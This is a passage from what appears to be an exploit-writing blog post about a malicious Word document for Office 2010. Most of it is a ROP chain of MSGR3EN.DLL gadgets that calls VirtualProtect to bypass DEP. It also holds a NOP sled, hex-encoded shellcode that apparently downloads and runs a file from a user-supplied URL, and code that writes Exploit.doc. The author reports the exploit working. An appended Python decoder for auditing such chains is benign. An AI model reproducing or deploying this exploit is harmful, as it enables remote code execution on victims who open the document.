RETN [Module : MSGR3EN.DLL] ** param1 += “8aa02c3f” # 0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] ** param1 
+= “1197363f” # 0x3F369711 : {POP} # MOV DWORD PTR DS:[ESI+18],EAX # POP EDI # POP ESI # RETN 4 [Module : MSGR3EN.DLL] ** param1 += “41414141” # Padding for POP EDI param1 += “41414141” # Padding for POP ESI #——————– Setting 2nd Parameter ————————————–# param2 = “8c58343f” # 0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] ** param2 += “41414141” # Padding for RETN 4 param2 += “ef94303f” # 0x3F3094EF : # XCHG EAX,ESI # RETN [Module : MSGR3EN.DLL] ** param2 += “8c58343f” # 0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] ** param2 += “f782393f” # 0x3F3982F7 : # ADD EAX,100 # POP EBP # RETN [Module : MSGR3EN.DLL] ** param2 += “41414141” # Padding for POP EBP param2 += “e982393f” # 0x3F3982E9 : # ADD EAX,40 # POP EBP # RETN [Module : MSGR3EN.DLL] ** param2 += “41414141” # Padding for POP EBP param2 += “8aa02c3f” # 0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] ** param2 += “8aa02c3f” # 0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] ** param2 += “8aa02c3f” # 0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] ** param2 += “8aa02c3f” # 0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] ** param2 += “8aa02c3f” # 0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] ** param2 += “8aa02c3f” # 0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] ** param2 += “8aa02c3f” # 0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] ** param2 += “8aa02c3f” # 0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] ** param2 += “1197363f” # 0x3F369711 : {POP} # MOV DWORD PTR DS:[ESI+18],EAX # POP EDI # POP ESI # RETN 4 [Module : MSGR3EN.DLL] ** param2 += “41414141” # Padding for POP EDI param2 += “41414141” # Padding for POP ESI #————————- Fetch & Call VirtualProtect() address ———————-# call = “8c58343f” # 0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] ** call += “41414141” # Padding for RET 4 call += “4ced2f3f” # 0x3f2fed4c : # POP EAX # RETN ** [MSGR3EN.DLL] call += “0811103f” # PTR to VirtualProtect() call += “5e742b3f” # 0x3f2b745e : # MOV 
ECX,DWORD PTR DS:[EAX] # RETN ** [MSGR3EN.DLL] call += “8c58343f” # 0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] ** call += “30d7393f” # ADD EAX,8 # RETN [Module : MSGR3EN.DLL] ** call += “30d7393f” # ADD EAX,8 # RETN [Module : MSGR3EN.DLL] ** call += “30d7393f” # ADD EAX,8 # RETN [Module : MSGR3EN.DLL] ** call += “08da2f3f” # 0x3F2FDA08 : # XCHG EAX,ESP # RETN [Module : MSGR3EN.DLL] ** nops = “90” * 180 magic = ( “x65x62x37x31x33x31x63x39x36x34x38x62x37x31x33x30x38” “x62x37x36x30x63x38x62x37x36x31x63x38x62x35x65x30x38” “x38x62x37x65x32x30x38x62x33x36x36x36x33x39x34x66x31” “x38x37x35x66x32x63x33x36x30x38x62x36x63x32x34x32x34” “x38x62x34x35x33x63x38x62x35x34x32x38x37x38x30x31x65” “x61x38x62x34x61x31x38x38x62x35x61x32x30x30x31x65x62” “x65x33x33x34x34x39x38x62x33x34x38x62x30x31x65x65x33” “x31x66x66x33x31x63x30x66x63x61x63x38x34x63x30x37x34” “x30x37x63x31x63x66x30x64x30x31x63x37x65x62x66x34x33” “x62x37x63x32x34x32x38x37x35x65x31x38x62x35x61x32x34” “x30x31x65x62x36x36x38x62x30x63x34x62x38x62x35x61x31” “x63x30x31x65x62x38x62x30x34x38x62x30x31x65x38x38x39” “x34x34x32x34x31x63x36x31x63x33x65x38x39x32x66x66x66” “x66x66x66x35x64x65x62x30x35x65x38x66x33x66x66x66x66” “x66x66x38x39x65x66x38x33x65x66x38x39x38x39x65x65x38” “x33x65x65x39x35x38x31x65x64x34x35x66x66x66x66x66x66” “x36x38x33x33x63x61x38x61x35x62x35x33x65x38x38x61x66” “x66x66x66x66x66x35x35x36x61x36x34x66x66x64x30x35x37” “x38x39x63x37x30x31x65x66x61x34x38x30x37x66x66x66x30” “x30x37x35x66x39x35x66x36x38x38x65x34x65x30x65x65x63” “x35x33x65x38x36x64x66x66x66x66x66x66x33x31x63x39x36” “x36x62x39x36x66x36x65x35x31x36x38x37x35x37x32x36x63” “x36x64x35x34x66x66x64x30x36x38x33x36x31x61x32x66x37” “x30x35x30x65x38x35x33x66x66x66x66x66x66x33x31x63x39” “x35x31x35x31x35x35x35x37x35x31x66x66x64x30x36x38x39” “x38x66x65x38x61x30x65x35x33x65x38x33x66x66x66x66x66” “x66x66x34x31x35x31x35x35x66x66x64x30x37x33x37x36x36” “x33x36x38x36x66x37x33x37x34x32x65x36x35x37x38x36x35” “x30x30” ) URL = “write your own url” binnu = 
binascii.b2a_hex(URL) shellcode = magic + binnu + URL2 end = (“x7Bx7Dx7Dx7Dx7Dx7Dx7Dx2Ex2Ex2Ex7Dx7D”) fo = open(“template”, “rb”) tmpl = fo.read(); fo.close() #################################### payload = tmpl + header + Main + req + control + rop + VirtualProtect + param1 + param2 + call + nops + shellcode + end ############################################# file = open(“Exploit.doc”,’wb’) file.write(payload) file.close Now we need to check if the exploit works.Let’s check the status of DEP.
DEP is enabled. Let's see if the exploit works.
Wow, the exploit is working fine. Just a reminder: my objective for this post was not to discuss how to create a ROP chain in detail but to show how to make an exploit work on Office 2010. One should easily be able to understand what I have written above. In the next article, I will write only about the process of making a ROP chain in detail, step by step.
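Every dword in the listings above is written as eight ASCII hex characters in little-endian byte order ("8546393f" is the gadget at 0x3F394685), which is easy to get wrong when reading or auditing such a chain by hand. The following decoder, an added example and not part of the original post, parses lines in that listing format, recovers the real address of each entry, names the flNewProtect constant, and flags entries whose comment disagrees with the encoded bytes (the sample lines are copied from the post; the `0x3F208016` comment on the `Main` line is one such case, as its bytes decode to 0x3F208017).

```python
import re
import struct

# flNewProtect constants a reader is likely to meet in such chains.
PAGE_PROTECT = {0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE"}
# A listing line: 8 hex chars in quotes, optional '* N' repeat, then a comment.
LINE_RE = re.compile(r'"([0-9a-fA-F]{8})"\s*(?:\*\s*(\d+))?\s*#\s*(.*)$')
CLAIM_RE = re.compile(r"0x([0-9a-fA-F]{8})")

def decode_dword(hex8):
    """8 ASCII hex chars in little-endian byte order -> integer ('8546393f' -> 0x3F394685)."""
    return struct.unpack("<I", bytes.fromhex(hex8))[0]

def decode_chain(listing):
    """Parse 'var += "xxxxxxxx" # comment' lines into (value, claimed, comment) tuples.
    claimed is the 0x... address found in the comment, or None for padding and
    parameter lines; a '"41414141" * 2' line yields two entries."""
    entries = []
    for line in listing.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        value, repeat, comment = decode_dword(m.group(1)), int(m.group(2) or 1), m.group(3).strip()
        c = CLAIM_RE.search(comment)
        claimed = int(c.group(1), 16) if c else None
        entries.extend([(value, claimed, comment)] * repeat)
    return entries

def mismatches(entries):
    """Entries whose encoded address differs from the address written in their comment."""
    return [e for e in entries if e[1] is not None and e[0] != e[1]]

def protect_name(value):
    """Symbolic name of a flNewProtect value, or its hex if it is not in the table."""
    return PAGE_PROTECT.get(value, hex(value))

# Constructed sample: five lines copied from the post's listing.
SAMPLE = '''
Main = "1780203f" # 0x3F208016 : # RETN [Module : MSGR3EN.DLL] **
rop = "8546393f" # 0x3F394685 : {POP} # PUSH ESP # XOR EAX,EAX # POP EDI # POP ESI # RETN
rop += "41414141" * 2 # Padding for JUMP
VirtualProtect += "dc050000" # Size 1500
VirtualProtect += "40000000" # flNewProtect
'''
if __name__ == "__main__":
    for value, claimed, comment in decode_chain(SAMPLE):
        note = "" if claimed in (None, value) else "  <-- comment disagrees with encoded bytes"
        print("0x%08X  %s%s" % (value, comment, note))
```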